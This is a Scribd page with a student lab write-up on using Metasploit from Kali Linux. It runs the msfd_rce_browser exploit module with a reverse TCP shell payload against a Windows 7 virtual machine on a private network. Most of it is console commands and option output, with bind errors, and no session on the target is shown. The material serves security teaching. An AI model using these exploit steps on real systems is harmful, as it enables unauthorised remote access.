Scribd
Upload
274 views6 pages

Practical No 10

The document discusses using Metasploit on Kali Linux to exploit a Windows 7 virtual machine. It performs a nmap scan to find TCP services on the target, then uses the msfd_rce_browser exploit module against the browser. Options like the payload, listen address, and port are set. The exploit is run, starting a reverse TCP handler to receive the payload connection.

Uploaded by

Praveen Mishra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
274 views6 pages

Practical No 10

The document discusses using Metasploit on Kali Linux to exploit a Windows 7 virtual machine. It performs a nmap scan to find TCP services on the target, then uses the msfd_rce_browser exploit module against the browser. Options like the payload, listen address, and port are set. The exploit is run, starting a reverse TCP handler to receive the payload connection.

Uploaded by

Praveen Mishra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Practical No 10

Metasploit using kali linux


Start metasploit in Kali linux.
In the background start windows 7 virtual machine. Open internet explorer – open
google.com
In Kali linux machine open znmap – type the target machine ip address and do intense
scan to explore the services to attack.
We found tcp services.
Inside Metasploit :
msf> search tcp
Then we will find lots of exploits. We have chosen the following one
msf > use exploit/multi/browser/msfd_rce_browser
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

Name Current Setting Required Description


---- --------------- -------- -----------
REMOTE_IP 127.0.0.1 yes Remote IP address when called from victim
REMOTE_PORT 55554 yes Remote port the service is running at
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on
the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)

Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/browser/msfd_rce_browser) > set srvport 1244
srvport => 1244
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

Name Current Setting Required Description


---- --------------- -------- -----------
REMOTE_IP 127.0.0.1 yes Remote IP address when called from victim
REMOTE_PORT 55554 yes Remote port the service is running at
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the
local machine or 0.0.0.0
SRVPORT 1244 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(multi/browser/msfd_rce_browser) > set ssl true


ssl => true
msf exploit(multi/browser/msfd_rce_browser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description


___________________________________________________________________
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
ruby/shell_bind_tcp normal Ruby Command Shell, Bind TCP
ruby/shell_bind_tcp_ipv6 normal Ruby Command Shell, Bind TCP IPv6
ruby/shell_reverse_tcp normal Ruby Command Shell, Reverse TCP
ruby/shell_reverse_tcp_ssl normal Ruby Command Shell, Reverse TCP SSL

msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp


payload => ruby/shell_reverse_tcp
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

Name Current Setting Required Description


___________________________________________________________________
REMOTE_IP 127.0.0.1 yes Remote IP address when called from victim
REMOTE_PORT 55554 yes Remote port the service is running at
SRVHOST 192.168.43.27 yes The local host to listen on. This must be an address
on the local machine or 0.0.0.0
SRVPORT 1244 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (ruby/shell_reverse_tcp):

Name Current Setting Required Description


_______________________________________________________________________
LHOST 192.168.43.26 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Automatic

msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.43.1


lhost => 192.168.43.1
msf exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 1.

[-] Handler failed to bind to 192.168.43.1:4444:- -


[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(multi/browser/msfd_rce_browser) > [-] Exploit failed [bad-config]:
Rex::BindFailed The address is already in use or unavailable: (192.168.43.27:1244).
Interrupt: use the 'exit' command to quit
msf exploit(multi/browser/msfd_rce_browser) > set srvhost 192.168.43.26
srvhost => 192.168.43.26
msf exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 2.

[-] Handler failed to bind to 192.168.43.1:4444:- -


[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
https://192.168.43.26:1244/h1qbTZ
[*] Server started.
ls -a
[*] exec: ls -a

.
..
.bash_history
.bashrc
.BurpSuite
.cache
.config
Desktop
Documents
Downloads
.gnupg
.ICEauthority
.java
.local
.mozilla
.msf4
Music
.mysql_history
Pictures
.profile
Public
.rnd
Templates
.vboxclient-clipboard.pid
.vboxclient-display.pid
.vboxclient-draganddrop.pid
.vboxclient-seamless.pid
Videos
.viminfo
.zenmap
msf exploit(multi/browser/msfd_rce_browser) >

You might also like